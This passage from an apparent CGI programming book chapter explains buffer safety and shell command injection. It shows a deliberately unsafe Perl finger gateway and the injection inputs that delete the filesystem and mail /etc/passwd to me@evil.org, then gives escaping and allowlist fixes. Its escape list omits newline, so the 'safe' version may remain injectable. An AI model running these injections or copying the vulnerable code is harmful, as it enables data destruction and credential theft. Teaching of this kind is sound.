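  assert(dst != NULL && src != NULL && dstsize > 0);
  len = strlen(src);
  if (len >= dstsize) {
    /* Too long: keep what fits, leaving the last byte for the '\0'. */
    memcpy(dst, src, dstsize - 1);
    dst[dstsize - 1] = '\0';
    return 0;
  }
  memcpy(dst, src, len + 1);  /* len + 1 also copies the '\0' */
  return 1;
}
```

With char buffer[80], a call such as copy_bounded(buffer, sizeof buffer, input) can never overflow buffer; check the return value if truncated input should be treated as an error.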

The code in Listing 9.2 solves two problems. First, it dynamically allocates enough memory to store the string, however long it is. Second, notice that I added 1 to the length of the message: I allocate enough memory for one more character than the length of the string. C strings end with a null character ('\0'), which strlen() does not count but strcpy() copies along with the rest of the string, so the extra byte is where that terminator goes. Keep this in mind when you handle CGI input yourself: the form data the server passes to your program on standard input is not null-terminated, so if you read it into a buffer, you must allocate the extra byte and place the null character there.
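Reading the form data yourself shows why that extra byte matters. The sketch below assumes the body of a POST request arrives on a stream whose length you already know; read_post_body() and the MAX_POST_BYTES limit are hypothetical, chosen only for illustration.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>

/* Assumed upper bound on accepted form data; tune it for your application. */
#define MAX_POST_BYTES 65536

/* Hypothetical helper: read exactly content_length bytes of form data from
   in (normally stdin) into a newly allocated, null-terminated string.
   Returns NULL if content_length exceeds MAX_POST_BYTES, if memory cannot
   be allocated, or if fewer bytes arrive than promised.
   The caller must free() the result. */
char *read_post_body(FILE *in, size_t content_length)
{
  char *body;

  assert(in != NULL);
  if (content_length > MAX_POST_BYTES)
    return NULL;
  /* One extra byte: the data the client sends carries no '\0' of its own. */
  body = malloc(content_length + 1);
  if (body == NULL)
    return NULL;
  if (fread(body, 1, content_length, in) != content_length) {
    free(body);
    return NULL;
  }
  body[content_length] = '\0';
  return body;
}
```

In an actual CGI program, you would pass stdin and the value of the CONTENT_LENGTH environment variable, parsed with strtoul() and checked for errors. Capping the length also keeps a client from making your program allocate an enormous buffer.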

Provided your C programs avoid problems such as buffer overflows, you can write secure CGI programs. However, this is a tough provision, especially for large, more complicated CGI programs. Problems like this force you to spend more time thinking about low-level programming tasks rather than the general CGI task. For this reason, you might prefer to program in a higher-level programming language (such as Perl) that robustly handles such low-level tasks.

However, there is a flip side to the high-level nature of Perl. Although you can assume that Perl will properly handle string allocation for you, there is always the danger that Perl is doing something in a high-level syntax of which you are not aware. This will become clearer in the next section on shell dangers.

Shell Dangers

Many CGI tasks are most easily implemented by running other programs. For example, if you were to write a CGI mail gateway, it would be silly to completely reimplement a mail transport agent within the CGI program. It's much more practical to pipe the data into an existing mail transport agent such as sendmail and let sendmail take care of the rest of the work. This practice is fine and is encouraged.

The security risk depends on how you call these external programs. There are several functions that do this in both C and Perl. Many of these functions work by spawning a shell and by having the shell execute the command. These functions are listed in Table 9.1. If you use one of these functions, you are vulnerable to weaknesses in UNIX shells.

Table 9.1. Functions in both C and Perl that spawn a shell.

Perl Functions          C Functions
system(' . . . ')       system()
open('| . . . ')        popen()
exec(' . . . ')
eval(' . . . ')
` . . . ` (back ticks)

Why are shells dangerous? There are several nonalphanumeric characters that are reserved as special characters by the shell. These characters are called metacharacters and are listed in Table 9.2.

Table 9.2. Shell metacharacters.

;  <  >  *  |  `  &  $  !  #  (  )  [  ]  {  }  '  "

Each of these metacharacters performs special functions within the shell. For example, suppose that you wanted to finger a machine and save the results to a file. From the command line, you might type:

finger @fake.machine.org > results

This would finger the host fake.machine.org and save the results to the text file results. The > character in this case is a redirection character. If you want to use the > character literally, for example to echo it to the screen, you need to precede it with a backslash. For example, the following prints a greater-than symbol (>) to the screen:

echo \>

Preceding a metacharacter with a backslash like this is called escaping it; escaping every metacharacter in a string is one way of sanitizing that string.

How can a hacker use this information to his or her advantage? Observe the finger gateway written in Perl in Listing 9.3. The program lets the user specify a user and a host; the CGI program then fingers the user at that host and displays the results.


Listing 9.3. finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - an unsafe finger gateway


require 'cgi-lib.pl';


print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
  print `/usr/bin/finger $in{'username'}`;
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}

At first glance, this might seem like a harmless finger gateway. There's no danger of a buffer overflow because it is written in Perl. I use the complete pathname of the finger binary so the gateway can't be tricked into using a fake finger program. If the input is in an improper format, the gateway will return an error but not one that can be manipulated.

However, what if I enter the following text into the field (as shown in Figure 9.1):

Figure 9.1 : Text to manipulate unsafe finger gateway.

nobody@nowhere.org ; /bin/rm -rf /

Work out how the following line will deal with this input:

print `/usr/bin/finger $in{'username'}`;

Because the line uses back ticks, Perl first spawns a shell. The shell then executes the following command:

/usr/bin/finger nobody@nowhere.org ; /bin/rm -rf /

What will this do? Imagine typing this in at the command line. It will wipe out all of the files and directories it can, starting from the root directory. We need to sanitize this input to render the semicolon (;) metacharacter harmless. In Perl, this is easily achieved with the function listed in Listing 9.4. (The equivalent function for C is in Listing 9.5; this function is from the cgihtml C library.)


Listing 9.4. escape_input() in Perl.
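sub escape_input {
  my ($str) = @_;

  # precede every shell metacharacter (and the backslash itself) with a backslash
  $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return $str;
}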


Listing 9.5. escape_input() in C.
#include <stdlib.h>
#include <string.h>


char *escape_input(const char *str)
/* takes string and escapes all metacharacters. should be used before
   including string in system() or similar call. returns a newly
   allocated string, which the caller must free(), or NULL if memory
   could not be allocated. */
{
  size_t i, j = 0;
  size_t len = strlen(str);
  /* worst case: every character needs a backslash, plus the null terminator */
  char *new = malloc(sizeof(char) * (len * 2 + 1));


  if (new == NULL)
    return NULL;
  for (i = 0; i < len; i++) {
    switch (str[i]) {
      case '|': case '&': case ';': case '(': case ')': case '<':
      case '>': case '\'': case '"': case '*': case '?': case '\\':
      case '[': case ']': case '$': case '!': case '#': case ':':
      case '`': case '{': case '}':
        new[j] = '\\';
        j++;
        break;
      default:
        break;
    }
    new[j] = str[i];
    j++;
  }
  new[j] = '\0';   /* terminate the string */
  return new;
}

This returns a string with the shell metacharacters preceded by a backslash. (The C version returns newly allocated memory, which the caller must free().) The revised finger.cgi gateway is in Listing 9.6.


Listing 9.6. A safe finger.cgi.
#!/usr/local/bin/perl
# finger.cgi - a safe finger gateway

require 'cgi-lib.pl';

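sub escape_input {
  my ($str) = @_;

  # precede every shell metacharacter (and the backslash itself) with a backslash
  $str =~ s/([;<>\*\|`&\$!?#\(\)\[\]\{\}:'"\\])/\\$1/g;
  return $str;
}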

print &PrintHeader;
if (&ReadParse(*in)) {
  print "<pre>\n";
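  # back ticks interpolate variables but do not call subroutines,
  # so escape the input first and interpolate the result
  $user = &escape_input($in{'username'});
  print `/usr/bin/finger $user`;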
  print "</pre>\n";
}
else {
  print "<html> <head>\n";
  print "<title>Finger Gateway</title>\n";
  print "</head>\n<body>\n";
  print "<h1>Finger Gateway</h1>\n";
  print "<form method=POST>\n";
  print "<p>User@Host: <input type=text name=\"username\">\n";
  print "<p><input type=submit>\n";
  print "</form>\n";
  print "</body> </html>\n";
}

This time, if you try the same input as before, a shell is spawned and it tries to execute:

/usr/bin/finger nobody@nowhere.org \; /bin/rm -rf /

The malicious attempt has been rendered useless. Rather than attempt to delete all the directories on the file system, it will try to finger the users nobody@nowhere.org, ;, /bin/rm, -rf, and /. It will probably return an error because it is unlikely that the latter four users exist on your system.

Note a couple of things. First, if your Web server was configured correctly (for example, running as an unprivileged user rather than as root), the attempt to delete everything on the file system would have failed. (If the server was running as root, the potential damage is limitless. Never do this!) Second, the attacker had to assume that the rm command was in the /bin directory (or, alternatively, that rm was somewhere in the path). Both are reasonable guesses for the majority of UNIX machines, but they are not universal truths. In a chrooted environment that did not have the rm binary anywhere in its directory tree, the hacker's efforts would have been useless. By properly securing and configuring the Web server, you can theoretically reduce the potential damage to almost zero, even with a badly written script.

However, this is no reason to be less careful when writing your CGI programs. In reality, most Web environments are not chrooted, simply because a chrooted environment takes away flexibility that many people need in a Web server. And even if the server's lack of root privileges kept an attacker from removing all the files in the file system, he or she could just as easily try input such as the following, which would e-mail the /etc/passwd file to me@evil.org for possible cracking:

nobody@nowhere.org ; /bin/mail me@evil.org < /etc/passwd

A hacker could do any number of other things by manipulating this one hole, even in a well-configured environment. If you let a hole slip past you in a simple CGI program, how can you be sure you properly and securely configured your complicated UNIX system and Web server?

The answer is, you can't. Your best bet is to make sure your CGI programs are secure. Not sanitizing input before running it in a shell is a simple thing to cure, and yet it is one of the most common mistakes in CGI programming.
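One way to make sure is to check input against a list of characters you know to be harmless, rather than trying to anticipate every dangerous one. This is a different technique from the escaping shown in Listings 9.4 through 9.6. The following C function is a hypothetical sketch for the finger gateway's field; the accepted character set (letters, digits, '.', '-', '_', and a single '@') is an assumption, not a rule from any standard.

```c
#include <assert.h>
#include <ctype.h>
#include <stddef.h>

/* Hypothetical allowlist check for a finger-style "user@host" field.
   Instead of escaping dangerous characters, accept only characters that
   plausibly appear in user and host names: letters, digits, '.', '-', '_'
   and at most one '@'. Returns 1 if str is acceptable, 0 otherwise. */
int valid_finger_query(const char *str)
{
  int at_signs = 0;
  size_t i;

  assert(str != NULL);
  if (str[0] == '\0' || str[0] == '-')
    return 0;  /* empty, or could be mistaken for a command-line option */
  for (i = 0; str[i] != '\0'; i++) {
    unsigned char c = (unsigned char) str[i];

    if (c == '@') {
      if (++at_signs > 1)
        return 0;
    } else if (!isalnum(c) && c != '.' && c != '-' && c != '_') {
      return 0;  /* anything not explicitly allowed is rejected */
    }
  }
  return 1;
}
```

A gateway using it would return an error page instead of running finger whenever valid_finger_query() returns 0. Rejecting a leading '-' also keeps the input from being mistaken for a finger option.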

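Fortunately, Perl has a good mechanism for catching potentially tainted variables. If you use taintperl instead of perl (or perl -T if you are using Perl 5), the script will exit with an error wherever a potentially tainted variable (one derived from outside input, such as form data) is passed to a shell command. Running your CGI program this way while you test it helps you catch uses of tainted variables before you actually put the program into service, although it can flag only the code paths your tests actually exercise. Note also that Perl considers a value untainted only after it has been extracted through a regular expression match; simply escaping a variable with a substitution does not untaint it.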

Notice that there are several more functions in Perl that spawn the shell than there are in C. It is not immediately obvious, even to the intermediate Perl programmer, that back ticks spawn a shell before executing the program. This is the flip side of using a higher-level language: you don't know what security holes a function might open because you don't necessarily know exactly what it does.

You don't need to sanitize the input if you avoid using functions that spawn shells. In Perl, you can do this with either the system() or the exec() function by passing the program and each of its arguments as separate parameters rather than as one command string; Perl then runs the program directly, without a shell. For example, the following is safe without sanitizing $in{'username'}:

system("/usr/bin/finger", $in{'username'});

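However, in the case of your finger gateway, this feature is not much help because you need to capture the output of the finger command, and system() does not return the command's output, only its exit status. Capturing the output without a shell means opening a pipe from a forked child process (for example, with open(FINGER, "-|")) and having the child call exec() with a list of arguments.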

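In C, you can also execute programs directly by using the exec family of functions: execv(), execl(), execvp(), execlp(), and execle(). None of these involves a shell, but unlike system(), they replace the calling process with the new program instead of returning to it. The C equivalent of the Perl function system() with multiple arguments is therefore to call fork(), have the child process call one of the exec functions (execl(), for example), and have the parent wait for the child with waitpid(). Which exec function you use and how you implement it depends on your needs; the specifics go beyond the scope of this book.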
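For the finger gateway, the C version also needs to capture the program's output, which calls for a pipe in addition to fork() and an exec function. Here is a minimal POSIX sketch; run_capture() is a hypothetical helper, its error handling is kept brief, and it assumes the caller supplies a full pathname, as the finger gateway does.

```c
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (POSIX only): run the program at path with the
   NULL-terminated argument list argv, with no shell involved, and copy up to
   outsize - 1 bytes of its standard output into out, null-terminated. Any
   further output is read and discarded so the child can finish normally.
   Returns the child's exit status (127 if path could not be executed),
   or -1 if the child could not be started or did not exit normally. */
int run_capture(const char *path, char *const argv[], char *out, size_t outsize)
{
  int fds[2], status;
  size_t used = 0;
  ssize_t n;
  pid_t pid;
  char scratch[256];

  assert(path != NULL && argv != NULL && out != NULL && outsize > 0);
  if (pipe(fds) == -1)
    return -1;
  pid = fork();
  if (pid == -1) {
    close(fds[0]);
    close(fds[1]);
    return -1;
  }
  if (pid == 0) {
    /* Child: connect stdout to the pipe, then replace this process with
       the program. The arguments go straight to it; no shell parses them. */
    close(fds[0]);
    if (dup2(fds[1], STDOUT_FILENO) == -1)
      _exit(127);
    close(fds[1]);
    execv(path, argv);
    _exit(127);  /* reached only if execv() failed */
  }
  /* Parent: read until the child closes its end of the pipe. */
  close(fds[1]);
  for (;;) {
    size_t room = outsize - 1 - used;

    if (room > 0)
      n = read(fds[0], out + used, room);
    else
      n = read(fds[0], scratch, sizeof scratch);  /* discard the excess */
    if (n <= 0)
      break;
    if (room > 0)
      used += (size_t) n;
  }
  out[used] = '\0';
  close(fds[0]);
  if (waitpid(pid, &status, 0) == -1)
    return -1;
  return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Called with the path /usr/bin/finger and an argument list such as { "finger", user, NULL }, the user's input reaches finger as a single argument, so a semicolon in it is just another character rather than a command separator.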

Secure Transactions

Privacy is an aspect of security discussed only briefly earlier. A popular type of CGI application these days collects credit card information. Data collection is a simple task for a CGI application, but the collection of sensitive data requires a secure means of getting the information from the browser to the server and CGI program.

For example, suppose that I want to sell books over the Internet. I might set up a Web server with a form that allows customers to buy books by submitting personal information and a credit card number. After I have that information, I want to store it on my machine for company records.

If anyone were to break into my company's machine, that person would have access to these confidential records containing customer information and credit card numbers. In order to prevent this, I would make sure the machine is configured securely and that my CGI script that accepts form input is written correctly so that it cannot be maliciously manipulated. In other words, as the administrator of the machine and the CGI programmer, I have a lot of control over the first problem: preventing information from being stolen directly from my machine.

However, how can I prevent someone from intercepting the information as it goes from the client to the server? Remember how information moves from the Web browser to the CGI program (as explained in Chapter 1, "Common Gateway Interface (CGI)")? Information flows over the network from the browser to the server first, and then the server passes the information to the CGI program. This information can be intercepted while it is moved from the client machine to the server (as shown in Figure 9.2). Note that in order to protect the information from being intercepted over the network, the information must be encrypted between the client and the server. You cannot implement a CGI-specific encryption scheme unless the client understands it, as well.

Figure 9.2 : A diagram of the information flow between the client, server, and CGI application.

Java, CGI, and Secure Transactions
Due to the nature of Web transactions, the only way you could develop and use your own secure transaction protocol using only CGI would be by first encrypting the form information before it is submitted by the browser to the server. The scheme would look like the diagram in Figure 9.3.
Until recently, developing your own secure transaction protocol was an impossible task. Thanks to recent innovations in client-side processing such as Java, such development is now possible.
The idea is to create a Java interface that is a superset of normal HTML forms. When the user selects the Java Submit button, the Java applet first encrypts the appropriate values and then sends them to the Web server using a normal HTTP POST request (see Figure 9.4).
Using Java as a client to send and receive encrypted data enables you to create your own customized encryption schemes without requiring a potentially expensive commercial server. For more information on how one might implement such a transaction, refer to Chapter 8, "Client/Server Issues."

Figure 9.3 : A secure transaction scheme using only CGI.

Figure 9.4 : An applet sends the form data instead of the browser.

Consequently, securing information over the network requires modifying the way the browser and the server communicate, something that cannot be controlled by using CGI. There are currently two major proposals for encrypted client/server transactions: Secure Sockets Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP), proposed by Enterprise Integration Technologies (EIT). At this point, it is not clear whether either scheme will become the standard; several companies have adopted both protocols in their servers. It is therefore useful to know how to write CGI programs for both schemes.

SSL

SSL is a protocol-independent encryption scheme that provides channel security between the application layer and the transport layer of the network protocol stack (see Figure 9.5). In plain English, this means that encrypted transactions are handled "behind the scenes" by the server and are essentially transparent to the HTML or CGI author.

Figure 9.5 : The SSL protocol providing secure Web transactions.

Because the client and server's network routines handle the encryption, almost all of your CGI scripts should work without modification with secure transactions. There is one notable exception. An nph (no-parse-header) CGI program bypasses the server and communicates directly with the client. Consequently, nph CGI scripts would break under secure transactions because the information never gets encrypted. A notable CGI application that is affected by this problem is Netscape server-push animations (discussed in detail in Chapter 14, "Proprietary Extensions"). I doubt this is a major concern, however, because an animation is almost certainly expendable on a page meant for transmitting sensitive information securely.

SHTTP

SHTTP takes a different approach from SSL. It works by extending the HTTP protocol (the application layer) rather than a lower layer. Consequently, whereas SSL can be used for all network services, SHTTP is a Web-specific protocol.

However, this has other benefits. As a superset of HTTP, SHTTP is backward and forward compatible with HTTP and SHTTP browsers and servers. In order to use SSL, you must have an SSL-enabled browser and server. Additionally, SHTTP is a much more flexible protocol. The server can designate preferred encryption schemes, for example.

SHTTP transactions depend on additional HTTP headers. Consequently, if you want your CGI program to take advantage of an SHTTP encrypted transaction, you need to include the appropriate headers. For example, instead of simply returning the HTTP header

Content-Type: text/html

you could return

Content-Type: text/html
Privacy-Enhancements: encrypt

When an SHTTP server receives this information from the CGI application, it will know to encrypt the information before sending it to the browser. A non-SHTTP browser will just ignore the extra header.
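In a C CGI program, adding the header is just a matter of printing one more line before the blank line that ends the headers. The sketch below is illustrative: write_cgi_headers() is a hypothetical helper, and the Privacy-Enhancements line is the one given above; a real SHTTP server may expect additional headers, so check the specification before relying on it.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical helper: write the CGI header block for an HTML page,
   optionally adding the SHTTP header shown in the text. Each header ends
   in a newline, and an empty line marks where the headers stop and the
   document body begins. Returns 0 on success, -1 if writing failed. */
int write_cgi_headers(FILE *out, int shttp_encrypt)
{
  assert(out != NULL);
  if (fputs("Content-Type: text/html\n", out) == EOF)
    return -1;
  if (shttp_encrypt && fputs("Privacy-Enhancements: encrypt\n", out) == EOF)
    return -1;
  if (fputs("\n", out) == EOF)  /* blank line terminates the headers */
    return -1;
  return 0;
}
```

A CGI program would call write_cgi_headers(stdout, 1) before printing its HTML; passing 0 produces the plain Content-Type header alone.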

For more information on using SHTTP, refer to the SHTTP specifications located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>.

Summary

Security is an all-encompassing thing when you are dealing with networked applications such as the World Wide Web. Writing secure CGI applications is not tremendously useful if your Web server is not securely configured. A properly configured Web server, on the other hand, can minimize the damage of a badly written CGI script.

In general, remember the following principles:

When you are writing CGI programs, be especially wary of the limitations (or lack thereof) of your programming language and of passing unsanitized variables to the shell.